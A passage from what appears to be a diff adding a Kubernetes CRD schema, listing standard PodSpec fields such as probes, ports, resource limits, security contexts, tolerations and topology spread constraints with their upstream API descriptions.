+ type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: 'Periodic probe of container liveness. Container will be restarted if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. 
+ format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as a DNS_LABEL. Each container in a pod must have a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. Exposing a port here gives the system additional information about the network connections a container uses, but is primarily informational. Not specifying a port here DOES NOT prevent that port from being exposed. Any port which is listening on the default "0.0.0.0" address inside a container will be accessible from the network. Cannot be updated. + items: + description: ContainerPort represents a network port in a single container. + properties: + containerPort: + description: Number of port to expose on the pod's IP address. This must be a valid port number, 0 < x < 65536. + format: int32 + type: integer + hostIP: + description: What host IP to bind the external port to. + type: string + hostPort: + description: Number of port to expose on the host. If specified, this must be a valid port number, 0 < x < 65536. If HostNetwork is specified, this must match ContainerPort. Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an IANA_SVC_NAME and unique within the pod. Each named port in a pod must have a unique name. Name for the port that can be referred to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". 
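
The ports list is primarily informational (omitting a port does not block it), and the x-kubernetes-list-map-keys annotation just below makes containerPort plus protocol the merge key for strategic-merge patches. A sketch; the image and port numbers are placeholders:

apiVersion: v1
kind: Pod
metadata:
  name: ports-demo
spec:
  containers:
  - name: app
    image: registry.example/app:1.0   # placeholder image
    ports:
    - name: http          # unique IANA_SVC_NAME within the pod
      containerPort: 8080
      protocol: TCP       # the default; part of the merge key
    - name: metrics
      containerPort: 9090
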
+ type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service readiness. Container will be removed from service endpoints if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. 
+ x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security options the container should be run with. If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime. 
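
The securityContext block here, like the earlier copy in this schema, notes repeatedly that container-level settings take precedence over the pod-level PodSecurityContext. A minimal sketch of that precedence; the UIDs are arbitrary:

apiVersion: v1
kind: Pod
metadata:
  name: precedence-demo
spec:
  securityContext:        # pod-wide defaults (PodSecurityContext)
    runAsUser: 1000
    runAsNonRoot: true
  containers:
  - name: app
    image: busybox:1.36
    command: ["id"]
    securityContext:
      runAsUser: 2000     # overrides the pod-level 1000 for this container
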
+ properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false. + type: boolean + procMount: + description: procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this container. If seccomp options are provided at both the pod & container level, the container options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. 
Unconfined - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod has successfully initialized. If specified, no other probes are executed until this completes successfully. If this probe fails, the Pod will be restarted, just as if the livenessProbe failed. This can be used to provide different probe parameters at the beginning of a Pod''s lifecycle, when it might take a long time to load data or warm a cache, than during steady-state operation. This cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. 
+ items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should close the stdin channel after it has been opened by a single attach. When stdin is true the stdin stream will remain open across multiple attach sessions. 
If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container process that reads from stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to which the container''s termination message will be written is mounted into the container''s filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicates how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block devices to be used by the container. + items: + description: volumeDevice describes a mapping of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside of the container that the device will be mapped to. + type: string + name: + description: name must match the name of a persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting of a Volume within a container. + properties: + mountPath: + description: Path within the container at which the volume should be mounted. Must not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10. + type: string + name: + description: This must match the Name of a Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false. + type: boolean + subPath: + description: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. 
+ type: string + required: + - name + type: object + type: array + nodeName: + description: NodeName is a request to schedule this pod onto a specific node. If it is non-empty, the scheduler simply schedules this pod onto that node, assuming that it fits resource requirements. + type: string + nodeSelector: + additionalProperties: + type: string + description: 'NodeSelector is a selector which must be true for the pod to fit on a node. Selector which must match a node''s labels for the pod to be scheduled on that node. More info: https://kubernetes.io/docs/concepts/configuration/assign-pod-node/' + type: object + x-kubernetes-map-type: atomic + overhead: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Overhead represents the resource overhead associated with running a pod for a given RuntimeClass. This field will be autopopulated at admission time by the RuntimeClass admission controller. If the RuntimeClass admission controller is enabled, overhead must not be set in Pod create requests. The RuntimeClass admission controller will reject Pod create requests which have the overhead already set. If RuntimeClass is configured and selected in the PodSpec, Overhead will be set to the value defined in the corresponding RuntimeClass, otherwise it will remain unset and treated as zero. More info: https://git.k8s.io/enhancements/keps/sig-node/688-pod-overhead/README.md This field is beta-level as of Kubernetes v1.18, and is only honored by servers that enable the PodOverhead feature.' + type: object + preemptionPolicy: + description: PreemptionPolicy is the Policy for preempting pods with lower priority. One of Never, PreemptLowerPriority. Defaults to PreemptLowerPriority if unset. This field is beta-level, gated by the NonPreemptingPriority feature-gate. + type: string + priority: + description: The priority value. Various system components use this field to find the priority of the pod. When Priority Admission Controller is enabled, it prevents users from setting this field. The admission controller populates this field from PriorityClassName. The higher the value, the higher the priority. + format: int32 + type: integer + priorityClassName: + description: If specified, indicates the pod's priority. "system-node-critical" and "system-cluster-critical" are two special keywords which indicate the highest priorities with the former being the highest priority. Any other name must be defined by creating a PriorityClass object with that name. If not specified, the pod priority will be default or zero if there is no default. + type: string + readinessGates: + description: 'If specified, all readiness gates will be evaluated for pod readiness. A pod is ready when all its containers are ready AND all conditions specified in the readiness gates have status equal to "True" More info: https://git.k8s.io/enhancements/keps/sig-network/580-pod-readiness-gates' + items: + description: PodReadinessGate contains the reference to a pod condition + properties: + conditionType: + description: ConditionType refers to a condition in the pod's condition list with matching type. + type: string + required: + - conditionType + type: object + type: array + restartPolicy: + description: 'Restart policy for all containers within the pod. One of Always, OnFailure, Never. Default to Always. 
More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle/#restart-policy' + type: string + runtimeClassName: + description: 'RuntimeClassName refers to a RuntimeClass object in the node.k8s.io group, which should be used to run this pod. If no RuntimeClass resource matches the named class, the pod will not be run. If unset or empty, the "legacy" RuntimeClass will be used, which is an implicit class with an empty definition that uses the default runtime handler. More info: https://git.k8s.io/enhancements/keps/sig-node/585-runtime-class This is a beta feature as of Kubernetes v1.14.' + type: string + schedulerName: + description: If specified, the pod will be dispatched by specified scheduler. If not specified, the pod will be dispatched by default scheduler. + type: string + securityContext: + description: 'SecurityContext holds pod-level security attributes and common container settings. Optional: Defaults to empty. See type description for default values of each field.' + properties: + fsGroup: + description: "A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod: \n 1. The owning GID will be the FSGroup 2. The setgid bit is set (new files created in the volume will be owned by FSGroup) 3. The permission bits are OR'd with rw-rw---- \n If unset, the Kubelet will not modify the ownership and permissions of any volume." + format: int64 + type: integer + fsGroupChangePolicy: + description: 'fsGroupChangePolicy defines behavior of changing ownership and permission of the volume before being exposed inside Pod. This field will only apply to volume types which support fsGroup based ownership(and permissions). It will have no effect on ephemeral volume types such as: secret, configmaps and emptydir. Valid values are "OnRootMismatch" and "Always". If not specified, "Always" is used.' + type: string + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence for that container. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence for that container. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to all containers. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in SecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence for that container. + properties: + level: + description: Level is SELinux level label that applies to the container. 
+ type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by the containers in this pod. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". + type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + supplementalGroups: + description: A list of groups applied to the first process run in each container, in addition to the container's primary GID. If unspecified, no groups will be added to any container. + items: + format: int64 + type: integer + type: array + sysctls: + description: Sysctls hold a list of namespaced sysctls used for the pod. Pods with unsupported sysctls (by the container runtime) might fail to launch. + items: + description: Sysctl defines a kernel parameter to be set + properties: + name: + description: Name of a property to set + type: string + value: + description: Value of a property to set + type: string + required: + - name + - value + type: object + type: array + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options within a container's SecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + serviceAccount: + description: 'DeprecatedServiceAccount is a deprecated alias for ServiceAccountName. 
Deprecated: Use serviceAccountName instead.' + type: string + serviceAccountName: + description: 'ServiceAccountName is the name of the ServiceAccount to use to run this pod. More info: https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/' + type: string + setHostnameAsFQDN: + description: If true the pod's hostname will be configured as the pod's FQDN, rather than the leaf name (the default). In Linux containers, this means setting the FQDN in the hostname field of the kernel (the nodename field of struct utsname). In Windows containers, this means setting the registry value of hostname for the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters to FQDN. If a pod does not have FQDN, this has no effect. Default to false. + type: boolean + shareProcessNamespace: + description: 'Share a single process namespace between all of the containers in a pod. When this is set containers will be able to view and signal processes from other containers in the same pod, and the first process in each container will not be assigned PID 1. HostPID and ShareProcessNamespace cannot both be set. Optional: Default to false.' + type: boolean + subdomain: + description: If specified, the fully qualified Pod hostname will be "<hostname>.<subdomain>.<pod namespace>.svc.<cluster domain>". If not specified, the pod will not have a domainname at all. + type: string + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully. May be decreased in delete request. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). If this value is nil, the default grace period will be used instead. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. Defaults to 30 seconds. + format: int64 + type: integer + tolerations: + description: If specified, the pod's tolerations. + items: + description: The pod this Toleration is attached to tolerates any taint that matches the triple <key,value,effect> using the matching operator <operator>. + properties: + effect: + description: Effect indicates the taint effect to match. Empty means match all taint effects. When specified, allowed values are NoSchedule, PreferNoSchedule and NoExecute. + type: string + key: + description: Key is the taint key that the toleration applies to. Empty means match all taint keys. If the key is empty, operator must be Exists; this combination means to match all values and all keys. + type: string + operator: + description: Operator represents a key's relationship to the value. Valid operators are Exists and Equal. Defaults to Equal. Exists is equivalent to wildcard for value, so that a pod can tolerate all taints of a particular category. + type: string + tolerationSeconds: + description: TolerationSeconds represents the period of time the toleration (which must be of effect NoExecute, otherwise this field is ignored) tolerates the taint. By default, it is not set, which means tolerate the taint forever (do not evict). Zero and negative values will be treated as 0 (evict immediately) by the system. + format: int64 + type: integer + value: + description: Value is the taint value the toleration matches to. If the operator is Exists, the value should be empty, otherwise just a regular string. 
+ type: string + type: object + type: array + topologySpreadConstraints: + description: TopologySpreadConstraints describes how a group of pods ought to spread across topology domains. Scheduler will schedule pods in a way which abides by the constraints. All topologySpreadConstraints are ANDed. + items: + description: TopologySpreadConstraint specifies how to spread matching pods among the given topology. + properties: + labelSelector: + description: LabelSelector is used to find matching pods. Pods that match this label selector are counted to determine the number of pods in their corresponding topology domain. + properties: + matchExpressions: + description: matchExpressions is a list of label selector requirements. The requirements are ANDed. + items: + description: A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values. + properties: + key: + description: key is the label key that the selector applies to. + type: string + operator: + description: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed. + type: object + type: object + maxSkew: + description: 'MaxSkew describes the degree to which pods may be unevenly distributed. When `whenUnsatisfiable=DoNotSchedule`, it is the maximum permitted difference between the number of matching pods in the target topology and the global minimum. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 1/1/0: | zone1 | zone2 | zone3 | | P | P | | - if MaxSkew is 1, incoming pod can only be scheduled to zone3 to become 1/1/1; scheduling it onto zone1(zone2) 